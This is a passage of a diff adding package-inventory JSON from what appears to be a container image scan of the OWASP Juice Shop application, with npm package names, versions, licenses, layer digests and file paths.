"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sanitize-html/node_modules/htmlparser2/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "http-cache-semantics@3.8.1", + "Name": "http-cache-semantics", + "Identifier": { + "PURL": "pkg:npm/http-cache-semantics@3.8.1", + "UID": "ddc54df1f009db5f" + }, + "Version": "3.8.1", + "Licenses": [ + "BSD-2-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/http-cache-semantics/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "http-cache-semantics@4.2.0", + "Name": "http-cache-semantics", + "Identifier": { + "PURL": "pkg:npm/http-cache-semantics@4.2.0", + "UID": "ad611d4a4e9e62d4" + }, + "Version": "4.2.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/make-fetch-happen/node_modules/http-cache-semantics/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "http-cache-semantics@4.2.0", + "Name": "http-cache-semantics", + "Identifier": { + "PURL": "pkg:npm/http-cache-semantics@4.2.0", + "UID": "fe513c040512b1b7" + }, + "Version": "4.2.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/http-cache-semantics/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "http-errors@1.8.1", + "Name": "http-errors", + "Identifier": { + "PURL": "pkg:npm/http-errors@1.8.1", + "UID": "f30cf1de0c576158" + }, + "Version": "1.8.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/serve-index/node_modules/http-errors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "http-errors@2.0.1", + "Name": "http-errors", + "Identifier": { + "PURL": "pkg:npm/http-errors@2.0.1", + "UID": "bae86bbb573f9a40" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/http-errors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "http-proxy-agent@4.0.1", + "Name": "http-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/http-proxy-agent@4.0.1", + "UID": "134d36a7bb639882" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/http-proxy-agent/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "http-proxy-agent@7.0.2", + "Name": "http-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/http-proxy-agent@7.0.2", + "UID": "601328b895b665e8" + }, + "Version": "7.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/http-proxy-agent/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "https-proxy-agent@5.0.1", + "Name": "https-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/https-proxy-agent@5.0.1", + "UID": "14e6b2ef2ddc333f" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/https-proxy-agent/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "https-proxy-agent@7.0.6", + "Name": "https-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/https-proxy-agent@7.0.6", + "UID": "e58cf4e1dd6cf0aa" + }, + "Version": "7.0.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/https-proxy-agent/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "humanize-ms@1.2.1", + "Name": "humanize-ms", + "Identifier": { + "PURL": "pkg:npm/humanize-ms@1.2.1", + "UID": "fb237736d7097f97" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/humanize-ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "i18n@0.11.1", + "Name": "i18n", + "Identifier": { + "PURL": "pkg:npm/i18n@0.11.1", + "UID": "4ab23dceb3869008" + }, + "Version": "0.11.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/i18n/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "iconv-lite@0.4.24", + "Name": "iconv-lite", + "Identifier": { + "PURL": "pkg:npm/iconv-lite@0.4.24", + "UID": "13e1acdd4a605ec2" + }, + "Version": "0.4.24", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/iconv-lite/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "iconv-lite@0.6.3", + "Name": "iconv-lite", + "Identifier": { + "PURL": "pkg:npm/iconv-lite@0.6.3", + "UID": "511674f37572b6b0" + }, + "Version": "0.6.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/encoding/node_modules/iconv-lite/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "iconv-lite@0.6.3", + "Name": "iconv-lite", + "Identifier": { + "PURL": "pkg:npm/iconv-lite@0.6.3", + "UID": "b3f7f24be93de555" + }, + "Version": "0.6.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt/node_modules/iconv-lite/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ieee754@1.2.1", + "Name": "ieee754", + "Identifier": { + "PURL": "pkg:npm/ieee754@1.2.1", + "UID": "56078040e53a07fb" + }, + "Version": "1.2.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ieee754/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ignore-walk@3.0.4", + "Name": "ignore-walk", + "Identifier": { + "PURL": "pkg:npm/ignore-walk@3.0.4", + "UID": "eb4b4a1bfa7cc23d" + }, + "Version": "3.0.4", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ignore-walk/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "iltorb@2.4.5", + "Name": "iltorb", + "Identifier": { + "PURL": "pkg:npm/iltorb@2.4.5", + "UID": "b1827709fe40f3b8" + }, + "Version": "2.4.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/iltorb/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "imurmurhash@0.1.4", + "Name": "imurmurhash", + "Identifier": { + "PURL": "pkg:npm/imurmurhash@0.1.4", + "UID": "cfd55bb090452055" + }, + "Version": "0.1.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/imurmurhash/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "indent-string@4.0.0", + "Name": "indent-string", + "Identifier": { + "PURL": "pkg:npm/indent-string@4.0.0", + "UID": "5081807762560301" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/indent-string/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "infer-owner@1.0.4", + "Name": "infer-owner", + "Identifier": { + "PURL": "pkg:npm/infer-owner@1.0.4", + "UID": "c1d991fb231888f8" + }, + "Version": "1.0.4", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/infer-owner/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "inflection@1.13.4", + "Name": "inflection", + "Identifier": { + "PURL": "pkg:npm/inflection@1.13.4", + "UID": "82ed5ffb0e25e46b" + }, + "Version": "1.13.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/inflection/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "inflight@1.0.6", + "Name": "inflight", + "Identifier": { + "PURL": "pkg:npm/inflight@1.0.6", + "UID": "6a5cff4b091c0d61" + }, + "Version": "1.0.6", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/inflight/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "inherits@2.0.4", + "Name": "inherits", + "Identifier": { + "PURL": "pkg:npm/inherits@2.0.4", + "UID": "1531daa95afd56f7" + }, + "Version": "2.0.4", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/inherits/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ini@1.3.8", + "Name": "ini", + "Identifier": { + "PURL": "pkg:npm/ini@1.3.8", + "UID": "ddeec74e3ea290b5" + }, + "Version": "1.3.8", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/global-prefix/node_modules/ini/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ini@1.3.8", + "Name": "ini", + "Identifier": { + "PURL": "pkg:npm/ini@1.3.8", + "UID": "5ecf3a4480f3af1b" + }, + "Version": "1.3.8", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/rc/node_modules/ini/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "internal-slot@1.1.0", + "Name": "internal-slot", + "Identifier": { + "PURL": "pkg:npm/internal-slot@1.1.0", + "UID": "b365c96f09f106c" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/internal-slot/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "interpret@1.1.0", + "Name": "interpret", + "Identifier": { + "PURL": "pkg:npm/interpret@1.1.0", + "UID": "8143cff0bd7437d" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/interpret/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "into-stream@3.1.0", + "Name": "into-stream", + "Identifier": { + "PURL": "pkg:npm/into-stream@3.1.0", + "UID": "77436ded185bdc95" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/into-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "invariant@2.2.4", + "Name": "invariant", + "Identifier": { + "PURL": "pkg:npm/invariant@2.2.4", + "UID": "34b3968c4baa473d" + }, + "Version": "2.2.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/invariant/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ip-address@10.2.0", + "Name": "ip-address", + "Identifier": { + "PURL": "pkg:npm/ip-address@10.2.0", + "UID": "b56521acbb0153bd" + }, + "Version": "10.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ip-address/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ip6@0.2.13", + "Name": "ip6", + "Identifier": { + "PURL": "pkg:npm/ip6@0.2.13", + "UID": "4bd3c3bcee2a2eea" + }, + "Version": "0.2.13", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ip6/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ipaddr.js@1.9.1", + "Name": "ipaddr.js", + "Identifier": { + "PURL": "pkg:npm/ipaddr.js@1.9.1", + "UID": "253f1619a16e8be2" + }, + "Version": "1.9.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ipaddr.js/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-absolute@1.0.0", + "Name": "is-absolute", + "Identifier": { + "PURL": "pkg:npm/is-absolute@1.0.0", + "UID": "6c417b0a63c3bfb5" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-absolute/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-arguments@1.2.0", + "Name": "is-arguments", + "Identifier": { + "PURL": "pkg:npm/is-arguments@1.2.0", + "UID": "e850e9a695c77ab1" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-arguments/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-array-buffer@3.0.5", + "Name": "is-array-buffer", + "Identifier": { + "PURL": "pkg:npm/is-array-buffer@3.0.5", + "UID": "a02d0e3e55bdebe6" + }, + "Version": "3.0.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-array-buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-bigint@1.1.0", + "Name": "is-bigint", + "Identifier": { + "PURL": "pkg:npm/is-bigint@1.1.0", + "UID": "3ed3dd6f10c0550" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-bigint/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-boolean-object@1.2.2", + "Name": "is-boolean-object", + "Identifier": { + "PURL": "pkg:npm/is-boolean-object@1.2.2", + "UID": "47cec15a77ffb699" + }, + "Version": "1.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-boolean-object/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-callable@1.2.7", + "Name": "is-callable", + "Identifier": { + "PURL": "pkg:npm/is-callable@1.2.7", + "UID": "79167240f4e43f74" + }, + "Version": "1.2.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-callable/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-core-module@2.16.2", + "Name": "is-core-module", + "Identifier": { + "PURL": "pkg:npm/is-core-module@2.16.2", + "UID": "eef149e5b2eed2db" + }, + "Version": "2.16.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-core-module/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-date-object@1.1.0", + "Name": "is-date-object", + "Identifier": { + "PURL": "pkg:npm/is-date-object@1.1.0", + "UID": "9383e34d63906ecd" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-date-object/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-expression@4.0.0", + "Name": "is-expression", + "Identifier": { + "PURL": "pkg:npm/is-expression@4.0.0", + "UID": "325a9ea3d381c" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-expression/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-extglob@2.1.1", + "Name": "is-extglob", + "Identifier": { + "PURL": "pkg:npm/is-extglob@2.1.1", + "UID": "a37eeb91df754bfd" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-extglob/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-fullwidth-code-point@1.0.0", + "Name": "is-fullwidth-code-point", + "Identifier": { + "PURL": "pkg:npm/is-fullwidth-code-point@1.0.0", + "UID": "49b4a5be6667b4f5" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/gauge/node_modules/is-fullwidth-code-point/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-fullwidth-code-point@2.0.0", + "Name": "is-fullwidth-code-point", + "Identifier": { + "PURL": "pkg:npm/is-fullwidth-code-point@2.0.0", + "UID": "18d865505a5d918e" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wide-align/node_modules/is-fullwidth-code-point/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-fullwidth-code-point@3.0.0", + "Name": "is-fullwidth-code-point", + "Identifier": { + "PURL": "pkg:npm/is-fullwidth-code-point@3.0.0", + "UID": "2a4f1b9b63e22425" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-fullwidth-code-point/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-glob@4.0.3", + "Name": "is-glob", + "Identifier": { + "PURL": "pkg:npm/is-glob@4.0.3", + "UID": "85c31ca112c9be20" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-glob/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-lambda@1.0.1", + "Name": "is-lambda", + "Identifier": { + "PURL": "pkg:npm/is-lambda@1.0.1", + "UID": "84bdb4a1802c32c8" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-lambda/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-map@2.0.3", + "Name": "is-map", + "Identifier": { + "PURL": "pkg:npm/is-map@2.0.3", + "UID": "9345666972d19fb9" + }, + "Version": "2.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-map/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-natural-number@4.0.1", + "Name": "is-natural-number", + "Identifier": { + "PURL": "pkg:npm/is-natural-number@4.0.1", + "UID": "8535934f4c20d63c" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-natural-number/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-number@7.0.0", + "Name": "is-number", + "Identifier": { + "PURL": "pkg:npm/is-number@7.0.0", + "UID": "d05cb3614ffcc8f6" + }, + "Version": "7.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + 